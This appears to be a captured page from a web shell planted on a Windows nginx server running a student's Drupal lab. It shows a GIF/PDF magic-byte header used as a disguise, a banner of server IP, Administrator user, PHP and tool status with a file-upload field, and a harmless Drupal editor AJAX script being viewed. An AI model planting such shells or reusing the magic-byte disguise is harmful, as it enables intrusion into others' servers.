GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/modules/editor/js/ |
Upload File : |
/** * @file * AJAX commands used by Editor module. */ (function ($, Drupal) { 'use strict'; /** * Command to save the contents of an editor-provided modal. * * This command does not close the open modal. It should be followed by a * call to `Drupal.AjaxCommands.prototype.closeDialog`. Editors that are * integrated with dialogs must independently listen for an * `editor:dialogsave` event to save the changes into the contents of their * interface. * * @param {Drupal.Ajax} [ajax] * The Drupal.Ajax object. * @param {object} response * The server response from the ajax request. * @param {Array} response.values * The values that were saved. * @param {number} [status] * The status code from the ajax request. * * @fires event:editor:dialogsave */ Drupal.AjaxCommands.prototype.editorDialogSave = function (ajax, response, status) { $(window).trigger('editor:dialogsave', [response.values]); }; })(jQuery, Drupal);